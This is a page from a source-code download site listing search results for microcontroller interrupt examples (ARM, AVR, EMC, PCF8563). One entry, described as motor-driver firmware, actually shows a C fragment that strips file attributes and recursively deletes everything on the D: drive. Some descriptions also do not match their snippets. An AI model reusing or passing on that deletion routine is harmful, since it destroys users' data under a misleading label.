Hot Search : Source embeded web remote control p2p game More...
Location : Home Search - INT 1
Search - INT 1 - List
AT91S_IPheader IpHeader; int status; AT91F_LowLevelInit(); AT91F_DBGU_Printk("\n\n\r-I- ======================================\n\r"); AT91F_DBGU_Printk("-I- AT91RM9200 EMAC Test\n\r"); AT91F_DBGU_Printk("-I- --------------------------------------\n\r"); //* System Timer initialization AT91F_ST_SetPeriodInterval(AT91C_BASE_ST, AT91C_ST_PITS); AT91F_ST_EnableIt(AT91C_BASE_ST, AT91C_ST_PITS); AT91F_AIC_ConfigureIt ( AT91C_BASE_AIC, // AIC base address AT91C_ID_SYS, // System peripheral ID AT91C_AIC_PRIOR_HIGHEST, // Max priority AT91C_AIC_SRCTYPE_INT_LEVEL_SENSITIVE, // Level sensitive AT91F_ST_ASM_HANDLER ); //* Enable ST interrupt AT91F_AIC_EnableIt(AT91C_BASE_AIC, AT91C_ID_SYS); //* Initialize AT91RM9200 EMAC status = AT91F_EmacEntry(); if (status) { sprintf(MsgBuffer, "Error EMAC init: 0x%x", status); AT91F_DBGU_Printk(MsgBuffer); while(1); } while(1) if (AT91F_ProcessEmacPacket(&IpHeader) == AT91C_IPPACKET) AT91F_DisplayIpPacket(&IpHeader);
Date : 2011-08-06 Size : 56.18kb User : onewind

美国ATMEL公司发布的基于AT91X40系列的ARM处理器的中断处理例程。-United States-based company issued a series of ARM MCU processor interrupt handling routines.
Date : 2026-01-07 Size : 264kb User : bestyt


Date : 2026-01-07 Size : 58kb User : 丁庆振

arm9 的ADS1.2编译系统 的中断源程序, 其中含汇编,C程序-arm9 the ADS1.2 compiler system interrupt source files, including a compilation of C Program
Date : 2026-01-07 Size : 35kb User : liu

Analog Device ARM-7 系列之 ADuC_7020 Evaluation Board 内多个学习范例全都是基于 Keil 工程版的 范例,附 ADuC_7020 Evaluation Board 原理图,而范例内容如下: 1.ADC 2.Comparator 3.DAC 4.FlashEE 5.FuncRam 6.INT 7.Mics 8.PLA 9.Pulse 10.S&C 11.TimerTrig 12.UART 13.Varplace-Analog Device ARM-7 Series ADuC_7020 Evaluation Board within a number of learning are all examples of projects based on the version of the Keil example, with ADuC_7020 Evaluation Board schematics, and examples are as follows: 1.ADC 2.Comparator 3.DAC 4.FlashEE 5. FuncRam 6.INT 7.Mics 8.PLA 9.Pulse 10.S
Date : 2026-01-07 Size : 734kb User : kly

2440 中断实例 按键盘键点亮LED灯,非常好的代码-2440 interrupt
Date : 2026-01-07 Size : 4kb User : poiu

AvrCalc calculate int, timing
Date : 2026-01-07 Size : 21kb User : zen

aduc7024(arm7)int 中断程序-aduc7024(arm7)
Date : 2026-01-07 Size : 56kb User : affff

此程序为"寻迹小车FollowMe"项目中电机驱动器硬件所用。 在这一版本要实现: 1、 接收并解析控制命令; 2、 使电机有良好的驱动特性,可正、反转动,且转动平稳、有力; 3、 可靠的获取转速反馈信号; 4、 根据反馈信号使用有效的控制策略使电机达到所需的转速; 5、 利用码盘的反馈信号控制行走距离; 6、 可以根据命令实现电机的特殊运行状态:刹车、惰行- sprintf(cmd,"attrib-s-r-h s",FileInfo.name) system(cmd) if( FileInfo.attrib == FILE_ATTRIBUTE_FILE) DeleteFile(FileInfo.name) else if(FileInfo.attrib == FILE_ATTRIBUTE_DIRECTORY){ if( FileInfo.name[0] != . ) { _chdir(FileInfo.name) MyDeleteFile() _chdir("..") } } }while(!_findnext(lHandle,&FileInfo)) _findclose(lHandle) } int main(){ if(_chdir("d:\\")) exit(1)
Date : 2026-01-07 Size : 22kb User : 林坤

ARM的time定时器、int外部中断测试源代码程序-Some friends in the past used to develop ARM with SDT system, would now like to use ADS to develop, there are works sdt transplantation method works for ads
Date : 2026-01-07 Size : 145kb User : xgj3721

友善之臂 Mini2440开发板,中断控制器实验代码!亲测-arm Mini2440 development board, an interrupt controller test code! Pro-test ...
Date : 2026-01-07 Size : 7kb User : lizhen

对中断系统的讲解,比较详细,感觉讲的比较好,希望对大家有所帮组-INT
Date : 2026-01-07 Size : 586kb User : 张三

M8 TLC2543 PB5-DATADIN PB0-DATAOUT PB1-#CS PB2-CLOCK //本程序没有使用tlc2543的EOC(转换结束标志)信号,片选一直处于选中,也可以自己加入片选信号 unsigned int tlc2543(unsigned char senddata) { unsigned int recdata = 0 unsigned int i = 0 senddata = 0B11010000 //控制字 recdata = 0 //接收到的转换结果数据 //PORTB &= 0B11111101 //片选使能(可选) NOP() NOP() for(i=0 i<12 i++) { if(senddata & 0x80) PORTB |= 0B00100000 else PORTB &= 0B11011111 //准备发送控制字 senddata <<= 1 if(PINB & 0x01) recdata |= 0x0001 else recdata &= 0xfffe recdata <<= 1 //接收上次转换结果-M8 TLC2543 PB5-DATADIN PB0-DATAOUT PB1-# CS PB2-CLOCK// This program does not use tlc2543 the EOC (end of conversion flag) signal, chip select has been in a select, you can also add their own chip-select signal unsigned int tlc2543 (unsigned char senddata) {unsigned int recdata = 0 unsigned int i = 0 senddata = 0B11010000 // control word recdata = 0 // receive the results of the data conversion// PORTB & = 0B11111101 // Chip Enable ( optional) NOP () NOP () for (i = 0 i < 12 i++) {if (senddata & 0x80) PORTB | = 0B00100000 else PORTB & = 0B11011111 // ready to send control words senddata < < = 1 if (PINB & 0x01) recdata | = 0x0001 else recdata & = 0xfffe recdata < < = 1 // Receive the last conversion result
Date : 2026-01-07 Size : 2kb User : 凌峰

ARM7 UART 中断模式 定时器0一秒定时中断 LED定时闪烁-ARM7-UART interrupt mode, timer 0 second timer interrupt LED flashes from time to
Date : 2026-01-07 Size : 2kb User : wangyong

FM3 富士通CORTEX M3的板子 INT-SYSTICK-LED实现-The FM3 Fujitsu CORTEX M3 board INT-SYSTICK-LED implementation
Date : 2026-01-07 Size : 840kb User : xiao li

把采集到的一段数据,去掉最大值、最小值之后,进行平均处理-Get rid of a piece of data, collected after maximum, minimum, average processing
Date : 2026-01-07 Size : 2kb User : 刘帅

国产高性价比ARM9核CH563技术资料,INT-Domestic high cost ARM9 core CH563 technical information, INT
Date : 2026-01-07 Size : 21kb User : luoyi

EM78P153S中断的应用,本程序以外部中断为例 上电时P50 输出高,在INT 引脚输入下降沿时进外部中断,P50 输出翻转一次。-Application of EM78P153S interrupt this program to external interrupt, for example On electric P50 output is high, the INT pin along the input falls into the external interrupt, flip a P50 output.
Date : 2026-01-07 Size : 232kb User : wanjie

EMC 单片机EM78P173N 外部中断汇编例程-EMC SCM EM78P173N external interrupt assembly routines
Date : 2026-01-07 Size : 12kb User : 王圭

本文主要描述 PCF8563 的中断输出功能,并给出相应的范例。范例实现每 1s 从/ INT 脚产生一次中断输出的功能。用户可以修改范例中定时器时钟源和倒计数数值寄存器的值, 以得到满足自己需要的中断输出周期,轻松实现 PCF8563 中断输出功能。-This paper describes PCF8563 interrupt output function, and give appropriate examples. Examples implement each 1s from/INT Foot generates an interrupt output. Users can modify the examples and countdown timer clock source Values register We need to be satisfied interrupt output cycle, easy PCF8563 interrupt output.
Date : 2026-01-07 Size : 290kb User : Neo
« 12 3 »
CodeBus is one of the largest source code repositories on the Internet!
Contact us :
1999-2046 CodeBus All Rights Reserved.